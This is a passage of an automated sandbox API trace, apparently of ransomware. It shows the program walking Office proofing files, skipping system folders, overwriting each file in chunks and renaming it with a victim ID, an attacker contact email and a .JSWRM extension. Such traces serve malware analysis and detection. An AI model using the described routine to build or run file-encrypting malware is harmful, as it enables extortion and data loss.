lpString2="system volume information") returned -1 [0139.592] lstrcmpiW (lpString1="msgr8en.dub", lpString2="msocache") returned -1 [0139.592] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msgr8en.dub", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.592] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msgr8en.dub", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msgr8en.dub", lpUsedDefaultChar=0x0) returned 11 [0139.592] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msgr8en.dub", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.592] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msgr8en.dub", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msgr8en.dub", lpUsedDefaultChar=0x0) returned 11 [0139.592] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.592] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.592] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\msgr8en.dub" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\msgr8en.dub"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.596] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5) returned 1 [0139.596] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.596] ReadFile (in: hFile=0x238, lpBuffer=0x23b978, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23b978*, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 1 [0139.596] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.596] WriteFile (in: hFile=0x238, lpBuffer=0x23b978*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23b978*, lpNumberOfBytesWritten=0x345e898*=0x0, lpOverlapped=0x0) returned 1 [0139.596] CloseHandle (hObject=0x238) returned 1 [0139.596] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\msgr8en.dub" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\msgr8en.dub"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\msgr8en.dub.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\msgr8en.dub.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.597] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc52c782a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc52c782a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd9328217, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x801fc0, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="MSGR8EN.LEX", cAlternateFileName="")) returned 1 [0139.597] lstrcmpiW (lpString1="MSGR8EN.LEX", lpString2=".") returned 1 [0139.597] lstrcmpiW (lpString1="MSGR8EN.LEX", lpString2="..") returned 1 [0139.597] lstrcmpiW (lpString1="MSGR8EN.LEX", lpString2="...") returned 1 [0139.597] lstrcmpiW (lpString1="MSGR8EN.LEX", lpString2="windows") returned -1 [0139.597] lstrcmpiW (lpString1="MSGR8EN.LEX", lpString2="recovery") returned -1 [0139.597] lstrcmpiW (lpString1="MSGR8EN.LEX", lpString2="perflogs") returned -1 [0139.597] lstrcmpiW (lpString1="MSGR8EN.LEX", lpString2="documents and settings") returned 1 [0139.598] lstrcmpiW (lpString1="MSGR8EN.LEX", lpString2="$RECYCLE.BIN") returned 1 [0139.598] lstrcmpiW (lpString1="MSGR8EN.LEX", lpString2="system volume information") returned -1 [0139.598] lstrcmpiW (lpString1="MSGR8EN.LEX", lpString2="msocache") returned -1 [0139.598] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSGR8EN.LEX", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.598] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSGR8EN.LEX", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSGR8EN.LEX", lpUsedDefaultChar=0x0) returned 11 [0139.598] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSGR8EN.LEX", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.598] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSGR8EN.LEX", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSGR8EN.LEX", lpUsedDefaultChar=0x0) returned 11 [0139.598] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.598] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.598] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\MSGR8EN.LEX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\msgr8en.lex"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.599] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8396736) returned 1 [0139.599] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.599] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0139.614] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.614] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0139.614] CloseHandle (hObject=0x238) returned 1 [0139.615] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\MSGR8EN.LEX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\msgr8en.lex"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\MSGR8EN.LEX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\msgr8en.lex.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.616] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xb039dcc, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xb039dcc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xb039dcc, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="msgr8es.dub", cAlternateFileName="")) returned 1 [0139.616] lstrcmpiW (lpString1="msgr8es.dub", lpString2=".") returned 1 [0139.616] lstrcmpiW (lpString1="msgr8es.dub", lpString2="..") returned 1 [0139.616] lstrcmpiW (lpString1="msgr8es.dub", lpString2="...") returned 1 [0139.616] lstrcmpiW (lpString1="msgr8es.dub", lpString2="windows") returned -1 [0139.616] lstrcmpiW (lpString1="msgr8es.dub", lpString2="recovery") returned -1 [0139.616] lstrcmpiW (lpString1="msgr8es.dub", lpString2="perflogs") returned -1 [0139.616] lstrcmpiW (lpString1="msgr8es.dub", lpString2="documents and settings") returned 1 [0139.616] lstrcmpiW (lpString1="msgr8es.dub", lpString2="$RECYCLE.BIN") returned 1 [0139.616] lstrcmpiW (lpString1="msgr8es.dub", lpString2="system volume information") returned -1 [0139.616] lstrcmpiW (lpString1="msgr8es.dub", lpString2="msocache") returned -1 [0139.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msgr8es.dub", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msgr8es.dub", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msgr8es.dub", lpUsedDefaultChar=0x0) returned 11 [0139.617] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msgr8es.dub", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.617] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msgr8es.dub", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msgr8es.dub", lpUsedDefaultChar=0x0) returned 11 [0139.617] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.617] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.617] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\msgr8es.dub" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\msgr8es.dub"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.617] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5) returned 1 [0139.618] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.618] ReadFile (in: hFile=0x238, lpBuffer=0x23ba08, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23ba08*, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 1 [0139.618] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.618] WriteFile (in: hFile=0x238, lpBuffer=0x23ba08*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23ba08*, lpNumberOfBytesWritten=0x345e898*=0x0, lpOverlapped=0x0) returned 1 [0139.618] CloseHandle (hObject=0x238) returned 1 [0139.618] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\msgr8es.dub" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\msgr8es.dub"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\msgr8es.dub.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\msgr8es.dub.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.619] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xb013b61, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xb013b61, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xb16b0a3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x69217c, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="MSGR8ES.LEX", cAlternateFileName="")) returned 1 [0139.619] lstrcmpiW (lpString1="MSGR8ES.LEX", lpString2=".") returned 1 [0139.619] lstrcmpiW (lpString1="MSGR8ES.LEX", lpString2="..") returned 1 [0139.619] lstrcmpiW (lpString1="MSGR8ES.LEX", lpString2="...") returned 1 [0139.619] lstrcmpiW (lpString1="MSGR8ES.LEX", lpString2="windows") returned -1 [0139.619] lstrcmpiW (lpString1="MSGR8ES.LEX", lpString2="recovery") returned -1 [0139.619] lstrcmpiW (lpString1="MSGR8ES.LEX", lpString2="perflogs") returned -1 [0139.619] lstrcmpiW (lpString1="MSGR8ES.LEX", lpString2="documents and settings") returned 1 [0139.619] lstrcmpiW (lpString1="MSGR8ES.LEX", lpString2="$RECYCLE.BIN") returned 1 [0139.619] lstrcmpiW (lpString1="MSGR8ES.LEX", lpString2="system volume information") returned -1 [0139.619] lstrcmpiW (lpString1="MSGR8ES.LEX", lpString2="msocache") returned -1 [0139.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSGR8ES.LEX", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSGR8ES.LEX", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSGR8ES.LEX", lpUsedDefaultChar=0x0) returned 11 [0139.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSGR8ES.LEX", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSGR8ES.LEX", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSGR8ES.LEX", lpUsedDefaultChar=0x0) returned 11 [0139.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.620] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\MSGR8ES.LEX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\msgr8es.lex"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.620] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6889852) returned 1 [0139.620] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.620] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0139.634] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.634] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0139.634] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0139.634] CloseHandle (hObject=0x238) returned 1 [0139.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0139.634] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0139.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0139.635] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0139.635] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0139.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0139.635] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0139.635] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0139.635] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0139.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0139.635] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0139.635] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0139.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0139.635] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0139.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0139.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0139.635] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\MSGR8ES.LEX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\msgr8es.lex"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\MSGR8ES.LEX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\msgr8es.lex.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0139.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0139.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0139.636] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xb0d2731, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xb0d2731, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xb0d2731, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="msgr8fr.dub", cAlternateFileName="")) returned 1 [0139.636] lstrcmpiW (lpString1="msgr8fr.dub", lpString2=".") returned 1 [0139.636] lstrcmpiW (lpString1="msgr8fr.dub", lpString2="..") returned 1 [0139.636] lstrcmpiW (lpString1="msgr8fr.dub", lpString2="...") returned 1 [0139.636] lstrcmpiW (lpString1="msgr8fr.dub", lpString2="windows") returned -1 [0139.636] lstrcmpiW (lpString1="msgr8fr.dub", lpString2="recovery") returned -1 [0139.636] lstrcmpiW (lpString1="msgr8fr.dub", lpString2="perflogs") returned -1 [0139.636] lstrcmpiW (lpString1="msgr8fr.dub", lpString2="documents and settings") returned 1 [0139.636] lstrcmpiW (lpString1="msgr8fr.dub", lpString2="$RECYCLE.BIN") returned 1 [0139.636] lstrcmpiW (lpString1="msgr8fr.dub", lpString2="system volume information") returned -1 [0139.636] lstrcmpiW (lpString1="msgr8fr.dub", lpString2="msocache") returned -1 [0139.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0139.637] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msgr8fr.dub", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.637] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msgr8fr.dub", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msgr8fr.dub", lpUsedDefaultChar=0x0) returned 11 [0139.637] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0139.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0139.637] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msgr8fr.dub", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.637] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msgr8fr.dub", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msgr8fr.dub", lpUsedDefaultChar=0x0) returned 11 [0139.637] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0139.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0139.637] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0139.637] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.637] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0139.637] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\msgr8fr.dub" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\msgr8fr.dub"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.641] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5) returned 1 [0139.641] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.641] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1) returned 0x23ba08 [0139.641] ReadFile (in: hFile=0x238, lpBuffer=0x23ba08, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23ba08*, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 1 [0139.641] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.641] WriteFile (in: hFile=0x238, lpBuffer=0x23ba08*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23ba08*, lpNumberOfBytesWritten=0x345e898*=0x0, lpOverlapped=0x0) returned 1 [0139.641] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ba08 | out: hHeap=0x1e0000) returned 1 [0139.641] CloseHandle (hObject=0x238) returned 1 [0139.641] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0139.642] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, 